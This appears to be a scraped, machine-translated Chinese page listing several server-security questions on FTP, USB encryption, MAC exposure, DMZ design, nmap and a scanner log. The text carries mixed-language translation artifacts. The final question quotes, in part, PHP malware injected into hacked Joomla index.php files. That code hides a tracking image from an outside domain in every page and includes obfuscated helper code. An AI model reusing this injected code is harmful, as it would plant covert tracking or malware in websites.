Articles of 安全

寻找BSD的FTP服务器build议

我目前正在决定使用什么ftp服务器来运行我们已经运行FreeBSD 6.2的内部系统。 我们需要的要求如下: 必须能够处理SSL,因为我们networking之外的所有stream量都必须encryption。 易于设置 如果可能的话,有Eclipse的插件,使开发人员感到高兴。 )这个不像其他的那么重要。) 安全的历史 一个仍在维护中的服务器 任何人有任何build议提供?

安全的USB闪存驱动器,不需要重新启动

由于数据丢失,我们现在有一个公司政策(由主要合作伙伴作为持续资助的条件,不可转让),只有经批准的存储设备才能从我们的networking复制数据 – 基本上只有外部硬盘和闪存使用encryption的驱动器。 问题出现在用户将他们的闪存驱动器与Powerpoint演示文稿不在一起,并将其插入到其他人的PC中。 驱动器想要安装软件(一些需要pipe理员权限)并重新启动才能工作,这会导致各种问题。 任何人都可以build议一个安全/encryption的USB闪存驱动器连接到电脑与最less的大惊小怪? 让我们把它限制到Windows,因为把OSX和Linux带入混合使得它更难。

公共MAC地址知识导致哪些安全问题?

通过了解目标计算机的MAC地址,什么types的攻击成为可能或更糟? 我打算使用UUID中包含生成计算机的MAC地址的1类UUID生成器。 我读过,你应该知道使用这种types的UUID的安全方面,但没有find一个很好的资源存在什么实际问题。

SFTP:如何将数据保存在DMZ之外

我们正在研究解决以下问题的方法: 我们有需要访问敏感信息的外部(互联网)用户。 我们可以通过SFTP提供给他们,这将提供一个安全的传输方法。 但是,我们不想维护服务器上的数据,因为它将驻留在DMZ中。 是否有一个SFTP服务器“访问复制”,如果DMZ中的盒子被攻破,那么该盒子上没有实际的数据? 我正在构想一个SFTP代理或SFTP传递。 目前是否有这样的产品?

在DMZ中放置Windows DC,Exchange

我公司有一个人告诉我,我应该把FF:TMG放在我的主要面向Internet的防火墙(Cisco 5510)之间,并将我的Exchange服务器和DC放在内部networking上。 我有另一个人告诉我,我应该把Exchange服务器和DC在DMZ 我不是特别喜欢在DMZ中使用我的邮箱和DC的用户名/密码的想法,我认为Windows身份validation会要求我在DMZ和我的内部networking之间打开这么多的端口,这将是一个有争议的问题它反正在那里。 有什么想法? 你如何设置?

networking服务器日志:“Morfeus F *** ing Scanner”

我刚刚在我的Web服务器日志文件中发现了这些访问: ::ffff:218.38.136.38 109.72.95.175 – [10/Jan/2011:02:54:12 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 345 "-" "Morfeus Fucking Scanner" ::ffff:218.38.136.38 109.72.95.174 – [10/Jan/2011:02:54:12 +0100] "GET /user/soapCaller.bs HTTP/1.1" 404 345 "-" "Morfeus Fucking Scanner" 我应该开始担心吗? 还是只是一个正常的尝试来破解我的服务器? 谢谢

什么是保护专有服务器到客户现场的最佳实践?

一个例子就是Google Search Appliance 。 所涉及的领域可能包括closures和软件安全,远程访问和更新等。 与Google Search Appliance级别相比,更多地寻找覆盖80%风险和要求的解决scheme。

防火墙规则将导致nmap的问题

我不是在说阻塞端口。 我记得find一个主机,当我运行一个正常的TCP扫描nmap hostname ,nmap不会返回任何有意义的结果。 这是超时的问题。 如果我将超时值设置为很低的值,并设置 – –max-retries 0那么它将工作。 有谁知道一个iptables规则集导致nmap的问题?

VPS设置为MySQL

我们的VPS的设置方式是通过本地主机和用户名/密码/数据库名从任何域访问所有数据库。 这是通常的设置,还是应该有一些“监禁”每个用户的方式,所以他们不能访问本地主机上的其他数据库? 谢谢,马克

发现谁攻击我的网站

可能重复: 我的服务器被黑了应急 所有的Joomla! 在我的单个服务器上托pipe的站点被黑客攻击,并将以下代码注入到许多目录的index.php文件中。 <?php //{{126104ed GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; […]